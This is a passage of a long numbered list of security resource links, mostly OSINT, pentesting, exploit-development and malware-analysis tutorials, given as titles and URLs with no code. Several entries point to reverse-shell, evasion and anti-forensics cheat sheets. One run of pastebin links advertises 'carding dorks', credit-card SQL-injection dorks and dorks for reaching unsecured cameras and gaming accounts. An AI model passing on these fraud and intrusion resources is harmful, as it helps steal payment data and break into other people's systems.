https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint -1013-A Guide to Open Source Intelligence Gathering (OSINT): https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c -1014-OSINT: How to find information on anyone: https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56 -1015-What is OSINT? How can I make use of it?: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it -1016-OSINT Tools for the Dark Web: https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/ -1017-A Guide to Open Source Intelligence (OSINT): https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php -1018-An Introduction To Open Source Intelligence (OSINT): https://www.secjuice.com/introduction-to-open-source-intelligence-osint/ -1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive: https://www.aptive.co.uk/blog/tls-ssl-security-testing/ -1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]: https://www.exploit-db.com/ghdb/4262/?source=ghdbid -1021-cheat_sheets: http://zachgrace.com/cheat_sheets/ -1022-Intel SYSRET: https://pentestlab.blog/2017/06/14/intel-sysret -1023-Windows Preventive Maintenance Best Practices: http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/ -1024-An Overview of Storage Devices: http://www.professormesser.com/?p=19367 -1025-An Overview of RAID: http://www.professormesser.com/?p=19373 -1026-How to Troubleshoot: http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/ -1027-Mobile Device Security Troubleshooting: http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/ -1028-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1029-Using Wireshark - Display Filter Expressions: https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/ -1030-Decrypting SSL/TLS traffic with Wireshark: https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/ -1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.: https://onceupon.github.io/Bash-Oneliner/ -1032- Bash One-Liners Explained, Part I: Working with files : https://catonmat.net/bash-one-liners-explained-part-one -1033-Bash One-Liners Explained, Part IV: Working with history: https://catonmat.net/bash-one-liners-explained-part-four -1034-Useful bash one-liners : https://github.com/stephenturner/oneliners -1035-Some Random One-liner Linux Commands [Part 1]: https://www.ostechnix.com/random-one-liner-linux-commands-part-1/ -1036-The best terminal one-liners from and for smart admins + devs.: https://www.ssdnodes.com/tools/one-line-wise/ -1037-Shell one-liner: https://rosettacode.org/wiki/Shell_one-liner#Racket -1038-SSH Cheat Sheet: http://pentestmonkey.net/tag/ssh -1039-7000 Google Dork List: https://pastebin.com/raw/Tdvi8vgK -1040-GOOGLE HACKİNG DATABASE – GHDB: https://pastebin.com/raw/1ndqG7aq -1041-STEALING PASSWORD WITH GOOGLE HACK: https://pastebin.com/raw/x6BNZ7NN -1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework: http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework -1043-Open Source database of android malware: www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki -1044-big-list-of-naughty-strings: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt -1045-publicly available cap files: http://www.netresec.com/?page=PcapFiles -1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf -1047-Building a malware analysis toolkit: https://zeltser.com/build-malware-analysis-toolkit/ -1048-Netcat Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -1049-Packers and crypters: http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/ -1050-Evading antivirus: http://www.blackhillsinfosec.com/?p=5094 -1051-cheat sheets and information,The Art of Hacking: https://github.com/The-Art-of-Hacking -1052-Error-based SQL injection: https://www.exploit-db.com/docs/37953.pdf -1053-XSS cheat sheet: https://www.veracode.com/security/xss -1054-Active Directory Enumeration with PowerShell: https://www.exploit-db.com/docs/46990 -1055-Buffer Overflows, C Programming, NSA GHIDRA and More: https://www.exploit-db.com/docs/47032 -1056-Analysis of CVE-2019-0708 (BlueKeep): https://www.exploit-db.com/docs/46947 -1057-Windows Privilege Escalations: https://www.exploit-db.com/docs/46131 -1058-The Ultimate Guide For Subdomain Takeover with Practical: https://www.exploit-db.com/docs/46415 -1059-File transfer skills in the red team post penetration test: https://www.exploit-db.com/docs/46515 -1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules: https://www.exploit-db.com/docs/46049 -1061-Flying under the radar: https://www.exploit-db.com/docs/45898 -1062-what is google hacking? and why it is useful ?and how you can learn how to use it: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1063-useful blogs for penetration testers: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1064-useful #BugBounty resources & links & tutorials & explanations & writeups :: https://twitter.com/cry__pto/status/1143965322233483265?s=20 -1065-Union- based SQL injection: http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html -1066-Broken access control: https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails -1067-Understanding firewall types and configurations: http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls -1068-5 Kali Linux tricks that you may not know: https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html -1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter: https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html -1060-A Guide To Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers -1061-Advanced Recon Automation (Subdomains) case 1: https://medium.com/p/9ffc4baebf70 -1062-Security testing for REST API with w3af: https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------ -1062-The Lazy Hacker: https://securit.ie/blog/?p=86 -1063-Practical recon techniques for bug hunters & pen testers: https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md -1064-A More Advanced Recon Automation #1 (Subdomains): https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/ -1065-Expanding your scope (Recon automation #2): https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/ -1066-RCE by uploading a web.config: https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -1067-Finding and exploiting Blind XSS: https://enciphers.com/finding-and-exploiting-blind-xss/ -1068-Google dorks list 2018: http://conzu.de/en/google-dork-liste-2018-conzu -1096-Out of Band Exploitation (OOB) CheatSheet: https://www.notsosecure.com/oob-exploitation-cheatsheet/ -1070-Metasploit Cheat Sheet: https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1071-Linux Post Exploitation Cheat Sheet : red-orbita.com/?p=8455 -1072-OSCP/Pen Testing Resources : https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1073-Out Of Band Exploitation (OOB) CheatSheet : https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html -1074-HTML5 Security Cheatsheet: https://html5sec.org/ -1075-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/ -1076-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1076-Windows Post-Exploitation Command List: pentest.tonyng.net/windows-post-exploitation-command-list/ -1077-Transfer files (Post explotation) - CheatSheet https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ -1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ -1079-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -1081-Transferring files from Kali to Windows (post exploitation) : https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit: https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f... -1083-OSCP Goldmine (not clickbait): 0xc0ffee.io/blog/OSCP-Goldmine -1084-Privilege escalation: Linux : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1085-Exploitation Tools Archives : https://pentesttools.net/category/exploitationtools/ -1086-From Local File Inclusion to Remote Code Execution - Part 1: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 -1087-Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet: www.vulnerability-lab.com/resources/documents/587.txt -1089-Binary Exploitation: https://pwndevils.com/hacking/howtwohack.html 1090-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1091-Penetration Testing Tools Cheat Sheet : https://news.ycombinator.com/item?id=11977304 -1092-List of Metasploit Commands - Cheatsheet: https://thehacktoday.com/metasploit-commands/ -1093-A journey into Radare 2 – Part 2: Exploitation: https://www.megabeets.net/a-journey-into-radare-2-part-2/ -1094-Remote Code Evaluation (Execution) Vulnerability: https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ -1095-Exploiting Python Code Injection in Web Applications: https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat... -1096-Shells · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html -1097-MongoDB Injection cheat sheet Archives: https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/ -1098-Basic Shellshock Exploitation: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ -1099-Wireshark Tutorial and Tactical Cheat Sheet : https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/ -1100-Windows Command Line cheatsheet (part 2): https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm... -1101-Detecting WMI exploitation: www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation... 1102-Metasploit Cheat Sheet - Hacking Land : https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -1103-5 Practical Scenarios for XSS Attacks: https://pentest-tools.com/blog/xss-attacks-practical-scenarios/ -1104-Ultimate gdb cheat sheet: http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/ -1105-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -1106-Reverse Engineering Cheat Sheet: https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet -1107-Reverse Engineering For Malware Analysis: https://eforensicsmag.com/reverse_engi_cheatsheet/ -1108-Reverse-engineering Cheat Sheets : https://www.cheatography.com/tag/reverse-engineering/ -1109-Shortcuts for Understanding Malicious Scripts: https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross -1110-WinDbg Malware Analysis Cheat Sheet : https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -1111-Cheat Sheet for Malware Analysis: https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/ -1112-Tips for Reverse-Engineering Malicious Code : https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet -1113-Cheatsheet for radare2 : https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html -1114-Reverse Engineering Cheat Sheets: https://www.pinterest.com/pin/576390452300827323/ -1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links: https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed -1116-Malware Resources : https://www.professor.bike/malware-resources -1117-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1118-Getting cozy with exploit development: https://0x00sec.org/t/getting-cozy-with-exploit-development/5311 -1119-appsec - Web Security Cheatsheet : https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list -1120-PEDA - Python Exploit Development Assistance For GDB: https://www.pinterest.ru/pin/789044797190775841/ -1121-Exploit Development Introduction (part 1) : https://www.cybrary.it/video/exploit-development-introduction-part-1/ -1122-Windows Exploit Development: A simple buffer overflow example: https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a -1123-Exploit Development-Everything You Need to Know: https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ -1124-Exploit Development : https://0x00sec.org/c/exploit-development -1125-Exploit Development - Infosec Resources: https://resources.infosecinstitute.com/category/exploit-development/ -1126-Exploit Development : https://www.reddit.com/r/ExploitDev/ -1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1128-Exploit Development for Beginners: https://www.youtube.com/watch?v=tVDuuz60KKc -1129-Introduction to Exploit Development: https://www.fuzzysecurity.com/tutorials/expDev/1.html -1130-Exploit Development And Reverse Engineering: https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html -1131-wireless forensics: https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023 -1132-fake AP Detection: https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866 -1133-In-Depth analysis of SamSam Ransomware: https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ -1134-WannaCry ransomware: https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis -1135-malware analysis: https://www.sans.org/reading-room/whitepapers/malicious/paper/2103 -1136-Metasploit's detailed communication and protocol writeup: https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf -1137-Metasploit's SSL-generation module:: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb -1139-Empire IOCs:: https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315 -1140-excellent free training on glow analysis: http://opensecuritytraining.info/Flow.html -1141-NetFlow using Silk: https://tools.netsa.cert.org/silk/analysis-handbook.pdf -1142-Deep Packet Inspection: https://is.muni.cz/th/ql57c/dp-svoboda.pdf -1143-Detecting Behavioral Personas with OSINT and Datasploit: https://www.exploit-db.com/docs/45543 -1144-WordPress Penetration Testing using WPScan and MetaSploit: https://www.exploit-db.com/docs/45556 -1145-Bulk SQL Injection using Burp-to-SQLMap: https://www.exploit-db.com/docs/45428 -1146-XML External Entity Injection - Explanation and Exploitation: https://www.exploit-db.com/docs/45374 -1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3): https://www.exploit-db.com/docs/45368 -1148-File Upload Restrictions Bypass: https://www.exploit-db.com/docs/45074 -1149-VLAN Hopping Attack: https://www.exploit-db.com/docs/45050 -1150-Jigsaw Ransomware Analysis using Volatility: https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9 -1151-Ransomware early detection by the analysis of file sharing traffic: https://www.sciencedirect.com/science/article/pii/S108480451830300X -1152-Do You Think You Can Analyse Ransomware?: https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529 -1153-Analysis of LockerGoga Ransomware : https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ -1154-Detection and Forensic Analysis of Ransomware Attacks : https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf -1155-Bad Rabbit Ransomware Technical Analysis: https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/ -1156-NotPetya Ransomware analysis : https://safe-cyberdefense.com/notpetya-ransomware-analysis/ -1157-Identifying WannaCry on Your Server Using Logs: https://www.loggly.com/blog/identifying-wannacry-server-using-logs/ -1158-The past, present, and future of ransomware: https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/ -1159-The dynamic analysis of WannaCry ransomware : https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf -1160-Malware Analysis: Ransomware - SlideShare: https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware -1161-Article: Anatomy of ransomware malware: detection, analysis : https://www.inderscience.com/info/inarticle.php?artid=84399 -1162-Tracking desktop ransomware payments : https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf -1163-What is Ransomware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/ransomware -1164-Detect and Recover from Ransomware Attacks: https://www.indexengines.com/ransomware -1165-Wingbird rootkit analysis: https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html -1166-Windows Kernel Rootkits: Techniques and Analysis: https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html -1167-Rootkit: What is a Rootkit and How to Detect It : https://www.veracode.com/security/rootkit -1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis: https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/ -1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2: https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/ -1170-ZeroAccess – an advanced kernel mode rootkit : https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf -1171-Rootkit Analysis Identification Elimination: https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination -1172-TDL3: The Rootkit of All Evil?: static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf -1173-Avatar Rootkit: Dropper Analysis: https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/ -1174-Sality rootkit analysis: https://www.prodefence.org/sality-rootkit-analysis/ -1175-RootKit Hook Analyzer: https://www.resplendence.com/hookanalyzer/ -1176-Behavioral Analysis of Rootkit Malware: https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/ -1177-Malware Memory Analysis of the IVYL Linux Rootkit: https://apps.dtic.mil/docs/citations/AD1004349 -1178-Analysis of the KNARK rootkit : https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit -1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim : https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1 -1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process -1181-Code & Process Injection - Red Teaming Experiments: https://ired.team/offensive-security/code-injection-process-injection -1182-What Malware Authors Don't want you to know: https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know -1183-.NET Process Injection: https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc -1184-Memory Injection like a Boss : https://www.countercept.com/blog/memory-injection-like-a-boss/ -1185-Process injection - Malware style: https://www.slideshare.net/demeester1/process-injection -1186-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -1187-Unpacking Redaman Malware & Basics of Self-Injection Packers: https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/ -1188-Code injection on macOS: https://knight.sc/malware/2019/03/15/code-injection-on-macos.html -1189-(Shell)Code Injection In Linux Userland : https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md -1190-Code injection on Windows using Python: https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/ -1191-What is Reflective DLL Injection and how can be detected?: https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/ -1192-Windows Process Injection: https://modexp.wordpress.com/2018/08/23/process-injection-propagate/ -1193-A+ cheat sheet: https://www.slideshare.net/abnmi/a-cheat-sheet -1194-A Bettercap Tutorial — From Installation to Mischief: https://danielmiessler.com/study/bettercap/ -1195-Debugging Malware with WinDbg: https://www.ixiacom.com/company/blog/debugging-malware-windbg -1195-Malware analysis, my own list of tools and resources: https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/ -1196-Getting Started with Reverse Engineering: https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html -1197-Debugging malicious windows scriptlets with Google chrome: https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c -1198-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1199-Intro to Malware Analysis and Reverse Engineering: https://www.cybrary.it/course/malware-analysis/ -1200-Common Malware Persistence Mechanisms: https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/ -1201-Finding Registry Malware Persistence with RECmd: https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd -1202-Windows Malware Persistence Mechanisms : https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/ -1203- persistence techniques: https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/ -1204- Persistence Mechanism - an overview | ScienceDirect Topics: https://www.sciencedirect.com/topics/computer-science/persistence-mechanism -1205-Malware analysis for Linux: https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/ -1206-Linux Malware Persistence with Cron: https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/ -1207-What is advanced persistent threat (APT)? : https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT -1208-Malware Analysis, Part 1: Understanding Code Obfuscation : https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/ -1209-Top 6 Advanced Obfuscation Techniques: https://sensorstechforum.com/advanced-obfuscation-techniques-malware/ -1210-Malware Obfuscation Techniques: https://dl.acm.org/citation.cfm?id=1908903 -1211-How Hackers Hide Their Malware: Advanced Obfuscation: https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723 -1212-Malware obfuscation techniques: four simple examples: https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/ -1213-Malware Monday: Obfuscation: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0 -1213-Challenge of Malware Analysis: Malware obfuscation Techniques: https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327 -1214-Static Malware Analysis - Infosec Resources: https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/ -1215-Malware Basic Static Analysis: https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725 -1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis: http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/ -1217-What is Malware Analysis | Different Tools for Malware Analysis: https://blog.comodo.com/different-techniques-for-malware-analysis/ -1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning: https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/ -1219-Limits of Static Analysis for Malware Detection: https://ieeexplore.ieee.org/document/4413008 -1220-Kernel mode versus user mode: https://blog.codinghorror.com/understanding-user-and-kernel-mode/ -1221-Understanding the ELF: https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571 -1222-Windows Privilege Abuse: Auditing, Detection, and Defense: https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e -1223-First steps to volatile memory analysis: https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1 -1224-Maliciously Mobile: A Brief History of Mobile Malware: https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8 -1225-Modern Binary Exploitation Writeups 0x01: https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4 -1226-Exploit Development 01 — Terminology: https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5 -1227-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1228-Best google hacking list on the net: https://pastebin.com/x5LVJu9T -1229-Google Hacking: https://pastebin.com/6nsVK5Xi -1230-OSCP links: https://pastebin.com/AiYV80uQ -1231-Pentesting 1 Information gathering: https://pastebin.com/qLitw9eT -1232-OSCP-Survival-Guide: https://pastebin.com/kdc6th08 -1233-Googledork: https://pastebin.com/qKwU37BK -1234-Exploit DB: https://pastebin.com/De4DNNKK -1235-Dorks: https://pastebin.com/cfVcqknA -1236-GOOGLE HACKİNG DATABASE: https://pastebin.com/1ndqG7aq -1237-Carding Dorks 2019: https://pastebin.com/Hqsxu6Nn -1238-17k Carding Dorks 2019: https://pastebin.com/fgdZxy74 -1239-CARDING DORKS 2019: https://pastebin.com/Y7KvzZqg -1240-sqli dork 2019: https://pastebin.com/8gdeLYvU -1241-Private Carding Dorks 2018: https://pastebin.com/F0KxkMMD -1242-20K dorks list fresh full carding 2018: https://pastebin.com/LgCh0NRJ -1243-8k Carding Dorks :): https://pastebin.com/2bjBPiEm -1244-8500 SQL DORKS: https://pastebin.com/yeREBFzp -1245-REAL CARDING DORKS: https://pastebin.com/0kMhA0Gb -1246-15k btc dorks: https://pastebin.com/zbbBXSfG -1247-Sqli dorks 2016-2017: https://pastebin.com/7TQiMj3A -1248-Here is kind of a tutorial on how to write google dorks.: https://pastebin.com/hZCXrAFK -1249-10k Private Fortnite Dorks: https://pastebin.com/SF9UmG1Y -1250-find login panel dorks: https://pastebin.com/9FGUPqZc -1251-Shell dorks: https://pastebin.com/iZBFQ5yp -1252-HQ PAID GAMING DORKS: https://pastebin.com/vNYnyW09 -1253-10K HQ Shopping DORKS: https://pastebin.com/HTP6rAt4 -1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold: https://pastebin.com/ttxAJbdW -1255-Gain access to unsecured IP cameras with these Google dorks: https://pastebin.com/93aPbwwE -1256-new fresh dorks: https://pastebin.com/ZjdxBbNB -1257-SQL DORKS FOR CC: https://pastebin.com/ZQTHwk2S -1258-Wordpress uploadify Dorks Priv8: https://pastebin.com/XAGmHVUr -1259-650 DORKS CC: https://pastebin.com/xZHARTyz -1260-3k Dorks Shopping: https://pastebin.com/e1XiNa8M -1261-DORKS 2018 : https://pastebin.com/YAZkPJ0j -1262-HQ FORTNITE DORKS LIST: https://pastebin.com/rzhiNad8 -1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING: https://pastebin.com/VwVpAvj2 -1264-Camera dorks: https://pastebin.com/fsARft2j -1265-Admin Login Dorks: https://pastebin.com/HWWNZCph -1266-sql gov dorks: https://pastebin.com/C8wqyNW8 -1267-10k hq gaming dorks: https://pastebin.com/cDLN8edi -1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! : https://pastebin.com/y59kK2h0 -1269-Dorks: https://pastebin.com/PKvZYMAa -1270-10k btc dorks: https://pastebin.com/vRnxvbCu -1271-7,000 Dorks for hacking into various sites: https://pastebin.com/n8JVQv3X -1272-List of information gathering search engines/tools etc: https://pastebin.com/GTX9X5tF -1273-FBOSINT: https://pastebin.com/5KqnFS0B -1274-Ultimate Penetration Testing: https://pastebin.com/4EEeEnXe -1275-massive list of information gathering search engines/tools : https://pastebin.com/GZ9TVxzh -1276-CEH Class: https://pastebin.com/JZdCHrN4 -1277-CEH/CHFI Bundle Study Group Sessions: https://pastebin.com/XTwksPK7 -1278-OSINT - Financial: https://pastebin.com/LtxkUi0Y -1279-Most Important Security Tools and Resources: https://pastebin.com/cGE8rG04 -1280-OSINT resources from inteltechniques.com: https://pastebin.com/Zbdz7wit -1281-Red Team Tips: https://pastebin.com/AZDBAr1m -1282-OSCP Notes by Ash: https://pastebin.com/wFWx3a7U -1283-OSCP Prep: https://pastebin.com/98JG5f2v -1284-OSCP Review/Cheat Sheet: https://pastebin.com/JMMM7t4f -1285-OSCP Prep class: https://pastebin.com/s59GPJrr -1286-Complete Anti-Forensics Guide: https://pastebin.com/6V6wZK0i -1287-The Linux Command Line Cheat Sheet: https://pastebin.com/PUtWDKX5 -1288-Command-Line Log Analysis: https://pastebin.com/WEDwpcz9 -1289-An A-Z Index of the Apple macOS command line (OS X): https://pastebin.com/RmPLQA5f -1290-San Diego Exploit Development 2018: https://pastebin.com/VfwhT8Yd -1291-Windows Exploit Development Megaprimer: https://pastebin.com/DvdEW4Az -1292-Some Free Reverse engineering resources: https://pastebin.com/si2ThQPP -1293-Sans: https://pastebin.com/MKiSnjLm -1294-Metasploit Next Level: https://pastebin.com/0jC1BUiv -1295-Just playing around....: https://pastebin.com/gHXPzf6B -1296-Red Team Course: https://pastebin.com/YUYSXNpG -1297-New Exploit Development 2018: https://pastebin.com/xaRxgYqQ -1298-Good reviews of CTP/OSCE (in no particular order):: https://pastebin.com/RSPbatip -1299-Vulnerability Research Engineering Bookmarks Collection v1.0: https://pastebin.com/8mUhjGSU -1300-Professional-hacker's Pastebin : https://pastebin.com/u/Professional-hacker -1301-Google Cheat Sheet: http://www.googleguide.com/print/adv_op_ref.pdf -1302-Shodan for penetration testers: https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf -1303-Linux networking tools: https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f -1304-DNS spoofing with NetHunter: https://cyberarms.wordpress.com/category/nethunter-tutorial/ -1305-Tips on writing a penetration testing report: https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 -1306-Technical penetration report sample: 